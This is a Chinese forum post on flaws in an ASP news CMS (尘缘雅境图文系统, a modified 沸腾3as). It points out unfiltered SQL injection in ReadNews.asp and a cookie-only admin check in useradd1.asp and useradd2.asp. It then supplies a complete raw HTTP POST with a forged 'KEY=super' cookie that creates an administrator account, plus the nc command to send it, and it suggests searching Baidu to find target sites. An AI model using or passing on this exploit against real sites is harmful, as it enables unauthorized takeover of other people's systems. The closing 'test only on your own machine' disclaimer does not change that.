|
<P align=center>尘缘雅境图文系统免费版(沸腾3as修改版)漏洞</P><P>尘缘雅境图文系统免费版(沸腾3as修改版)漏洞———添加系统管理员<BR> 尘缘雅境图文系统免费版(沸腾3as修改版)(以下简称‘沸腾修改版’)包括尘缘雅境图文系统免费版在内存在着很多的漏洞,由于沸腾修改版功能强大,比尘缘雅境图文系统免费版30build20030123增添了许多实用的功能,给好多以iis服务器为基础的部门网站的新闻添加带来了方便。但其整体安全性能实在令人担忧。<BR>在沸腾修改版中最普遍的问题是对用户提交的东西验证不严格也就是专业术语存在sql injection漏洞,虽然在有些地方过滤了空格或者单引号但好多地方并没有这样做。随便找一页看一看,就找最常用的一页ReadNews.asp,下面是部分代码:<BR>************************************************<BR><%'该文件需要进行调整和设置<BR>dim typename<BR>NewsID=Request.QueryString("NewsID") ‘得到newsid,但没有过滤再看下面.<BR>if newsid="" then<BR>Response.Write "未指定参数"<BR>else<BR>conn.execute("update News Set Click=click+1 where NewsID=" & NewsID ) ‘没有过滤<BR>set rs=server.CreateObject("ADODB.RecordSet")<BR>if uselevel=1 then<BR>if Request.cookies("key")="" then<BR>rs.Source="select * from News where checkked=1 and newslevel=0 and newsid="&newsid ‘没有<BR>end if<BR>省略部分代码……<BR>else<BR>rs.Source="select * from News where newsid="&newsid ‘没有过滤<BR>end if<BR>rs.Open rs.Source,conn,1,1<BR>if rs.bof and rs.eof then <BR>response.write "无权限访问或无此内容" <BR>else<BR>end if<BR>省略部分代码……<BR>看到了吧空格没有过滤,以前有几期《黑防》上已经介绍过怎么用了如:有一期介绍盗帅的攻击方式,不防可以试一试.怎么功自己想吧我也不知道怎么用因为我不怎么看懂^-^.这样的问题太普遍了不防下载一个沸腾修改版,看一看你也可以发现自己可以用的.<BR>不过这样太麻烦了, 沸腾修改版给了我们更’方便的功能’^-^,也就是我今天说的重点.<BR>先看admin目录下的两个文件,useradd1.asp和useradd2.asp的部分代码.<BR>useradd1.asp部分代码:<BR>***********************************<BR><!--#include file="conn.asp"--> ‘conn.asp连接数据库<BR><!--#include file="../include/config.asp"--> ‘config.asp 初始化整个系统<BR><%<BR>IF not(request.cookies("KEY")="super" or request.cookies("KEY")="typemaster" or request.cookies("KEY")="bigmaster") THEN ‘看到了吧限制用户访问的只判断key的值是否为super或. typemaster<BR>response.redirect "index_face.asp"<BR>response.end<BR>END IF<BR>%> <html> 身略部分代码……<BR>想到怎么用了吧一会再说,再看另一个文件<BR>useradd2.asp部分代码:<BR>********************************<BR><!--#include file=conn.asp --> <!--#include file="char.inc"--> ‘char.inc为一比较详尽的过滤字符的文件<BR><!--#include file="../include/md5.asp"--> ‘省略部分代码…… <BR>IF not(request.cookies("KEY")="super" or request.cookies("KEY")="typemaster" or request.cookies("KEY")="bigmaster") THEN ‘‘同样,限制用户访问的只判断key的值是否为super或. Typemaster,还有bigmaster ^-^<BR>response.redirect "index_face.asp"<BR>response.end<BR>END IF<BR>‘省略部分过滤非法字符的代码<BR>下面检查所添用户是否存在<BR>end if<BR>set rs=server.createobject("adodb.recordset")<BR>sql="select * from admin"<BR>rs.open sql,conn,3,3<BR>do while not rs.eof<BR>if rs("username")=UserName then<BR>response.write "已经存在这个用户名!请<a href=javascript:history.go(-1)>返回重新填写</a>!"<BR>‘省略部分的代码<BR>‘下面就开始添加用户了!!!!!!!!!!!<BR>rst.addnew<BR>rst("oskey")=oskey<BR>rst("shenhe")=request.form("shenhe")<BR>‘省略部分的代码<BR>end if<BR>rst.update<BR>**********************<BR>看到这怎么攻击有准了吧.<BR>准备一个nc.exe再在百度搜索一把,就搜”尘缘雅境”吧.好多吧.本人已经给你准备了攻击代码,把以下代码方到nc的目录内保存为1.txt:<BR>POST /cyyj/admin/useradd2.asp HTTP/1.1 ‘cyyj为本机上的尘缘雅境目录<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-gsarcade-launch, */*<BR>Referer: <A target=_blank href="http://127.0.0.1/cyyj/admin/useradd1.asp">http://127.0.0.1/cyyj/admin/useradd1.asp</A> ‘ip换一下呀<BR>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)<BR>Host: jlong<BR>Content-Length: 140<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: reglevel=; fullname=; purview=99999; KEY=super; UserName=; ASPSESSIONIDGQGGQBGU=HADHECFBHNKFGBFHOLDGHKMD; Passwd=; newsrelated=; Content=<BR>username=tupunco&passwd=115820484&passwd2=115820484&fullname=tupuncotupunco&depid=1&<BR>oskey=super&shenhe=0&purview=1&adder=tupunco&cmdOk=+%C8%B7+%B6%A8+<BR>再打开命令提示符转到nc目录内:<BR>c:\>d:<BR>d:\>cd nc<BR>d:\nc>nc –vv 127.0.0.1 80 <1.txt<BR>好了你现在得到了一个系统管理员的权限用户名为:tupunco 密码为: 115820484.<BR>好了登陆吧,添加一篇介绍告诉他怎么了……, 不要做坏事呀^-^<BR>注意只在自己的机子上实验通过!!!~~~~~</P> |
|
|Archiver|手机版|小黑屋|管理员之家
( 苏ICP备2023053177号-2 )
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
